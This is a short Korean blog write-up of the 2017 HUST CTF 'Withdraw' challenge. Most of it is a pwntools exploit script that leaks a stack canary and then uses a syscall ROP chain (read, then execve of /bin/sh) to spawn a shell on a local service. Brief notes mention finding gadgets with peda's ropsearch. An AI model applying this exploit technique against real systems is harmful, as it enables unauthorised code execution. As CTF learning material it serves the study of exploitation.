9oat's LAB
[2017 HUST] Withdraw 본문
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 | from pwn import * s = remote("127.0.0.1", 8888) pppr = p32(0x806f280) # edx ecx ebx eax = p32(0x8048882) int80 = p32(0x806f870) bss = p32(0x80ea3d0) binsh = "/bin/sh" print "[*] Start" s.recvuntil(": ") s.send("2\n") s.recvuntil(") ") s.send("y\n") s.recvuntil(".\n") s.send(("a"*64)+"x") s.recvn(68) canary = (u32(s.recvn(4))-0x78) print "[*] Canary Leak : " + hex(canary) canary = p32(canary) s.recvuntil(": ") s.send("1\n") s.recvuntil(": ") s.send("9047\n") s.recvuntil(": ") pay = '' pay += "a" * 32 pay += canary pay += "a" * 4 pay += pppr #read(0,bss,7) pay += p32(7) pay += bss pay += p32(0) pay += eax pay += p32(3) #read pay += int80 pay += pppr #execve(bss,0,0) pay += p32(0) pay += p32(0) pay += bss pay += eax pay += p32(11) #execve pay += int80 s.send(pay+'\n') s.send(binsh+'\n') s.interactive() | cs |
Statically Linked 문제는 처음 풀어봤다. Canary도 마찬가지.
peda의 ropsearch를 이용해서 적당한 가젯을 찾고. SystemCall을 이용한 ROP로 풀이된다.
ropsearch "int 0x80"
'Write Up > CTFs' 카테고리의 다른 글
| [2018 Codegate] Baskin (0) | 2018.07.11 |
|---|---|
| [2018 Codegate] Marimo (0) | 2018.07.11 |
| [PlaidCTF] ropasaurusrex (0) | 2017.07.05 |
Comments